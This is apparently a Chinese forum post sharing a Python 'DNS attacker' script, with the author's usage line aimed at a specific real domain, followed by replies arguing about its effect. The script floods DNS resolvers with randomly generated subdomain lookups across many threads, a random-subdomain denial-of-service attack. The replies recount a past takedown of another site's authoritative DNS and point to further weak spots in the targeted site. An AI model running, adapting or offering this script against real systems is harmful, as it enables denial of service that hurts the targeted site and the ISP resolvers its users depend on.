这个不是DNS放大攻击,而是攻击DNS根服务器。
风险自担。
使用:
python dnsattack.py moejn.com 5 5 (10)
python dnsattack.py 根域名 查询(攻击)次数 线程数 (生成长度,可不填)
#!/usr/bin/env python #coding:utf-8 # Author: Beining --<> # Purpose: A most easy DNS attacker # Created: 01/15/2015 import os import sys import unittest import socket from random import randint from multiprocessing.dummy import Pool as ThreadPool #---------------------------------------------------------------------- def resolve_ip(address): """""" try: socket.getaddrinfo(address, 80, 0, 0, socket.SOL_TCP) except: pass #---------------------------------------------------------------------- def main(address, time, length, thread_num): """""" domain_list = [''.join(map(lambda xx:(hex(ord(xx))[2:]),os.urandom(int(length)))) + '.' + str(address) for i in range(int(time))] pool = ThreadPool(int(thread_num)) results = pool.map(resolve_ip, domain_list) #close the pool and wait for the work to finish pool.close() pool.join() #---------------------------------------------------------------------- if __name__=='__main__': address = str(sys.argv[1]) time = int(sys.argv[2]) thread_num = int(sys.argv[3]) try: length = int(sys.argv[4]) except: length = randint(6, 32) print('Start!') main(address, time, length, thread_num) print('Done!')
1、受伤害的是ISP的DNS服务器而不是艦国的服务器。应该去D它的NS,而那是DNSPod估计D不动。
2、用多线程自己的电脑一定会比对方先挂。
总结,D人家的DNS无效。
0. 请看新版。
1. 都受伤。具体见DNS递归解析原理。
1)他是新网。
2)当然D不动了,Flood骨干网服务器?那我得买几个机房过来打。(要是那样我就直接故意route泄露了,这不比朝鲜那点小网络战来的爽?)
2. 你得读代码。
我没有任何请求直接打到他的NS上去,一切走递归。
只是加了个反射,而我的目标不是反射。
反射攻击不是这么玩的,这个反射太好洗,而且倍数太小了。
首先,他不能停解析。
其次,他不能回任何数据,回了这个测试的目的就达到了。
然后,他不能只对存在的解析回数据。因为还是要吃CPU。
这可不是小打小闹,14年12月10日的全国断网就是这个办法。而我这个比那个还给力。
找点机器跑一次?
没注意到子域名,你好像是随机生成了子域名吧。
1、他是 DNSPod,证据 1(dig NS):
;; QUESTION SECTION:
;moejn.com. IN NS
;; ANSWER SECTION:
moejn.com. 600 IN NS f1g1ns2.dnspod.net.
moejn.com. 600 IN NS f1g1ns1.dnspod.net.
证据 2(whois 的 Name Server 记录):
Domain Name: MOEJN.COM
Registrar: HICHINA ZHICHENG TECHNOLOGY LTD.
Sponsoring Registrar IANA ID: 420
Whois Server: grs-whois.hichina.com
Referral URL: http://www.net.cn
Name Server: F1G1NS1.DNSPOD.NET
Name Server: F1G1NS2.DNSPOD.NET
Status: ok
Updated Date: 16-jan-2015
Creation Date: 30-oct-2014
Expiration Date: 30-oct-2015
2、新版代码我已经读了,大概是让 DNS 回复到 DNS 机器上?
3、既然刚刚已经说了是 DNSPod(退一万步就算是万网自带的简易解析器),也是能抗住 DNS 反射攻击的
4、2014年12月10日的全国断网是因为根服务器被某墙投毒,而 TTL 设置了 24 小时导致的。本身投毒不是问题,问题是那次用了主路投毒(以前是旁路投毒),而且设了一个很长的 TTL 而导致即使根服务器刷新了缓存,下属服务器还没有刷新。而这次事件最大的危害也只是 24 小时 TTL。
5、目前对舰国效果最大的攻击还是数据库和验证码。数据库是 CDN 不能保护的,而验证码那个 bug 有很高的安全隐患。
6、舰国的最后判定还得等咔多咔瓦手电筒,现在「70萬出せば、君のものに」已经在11区屠版了。我觉得舰国到死也不远了,不过我还是希望能早日引进正版国服。
对。
1. 我whois太老?
2.是。
3. 不是反射。
反射是我弄个4K的记录,构造包打过去。这个明显不是。
而且放大倍数很低的。
4.不是一次。
GFW那次是GFW。
我说的是,有一次揍instagram follower网站,把他的权威DNS打垮了。
5. 他就是弄一堆小孩拿LOIC和HOIC轰。orz啊。
6. 我们做好我们自己吧。。。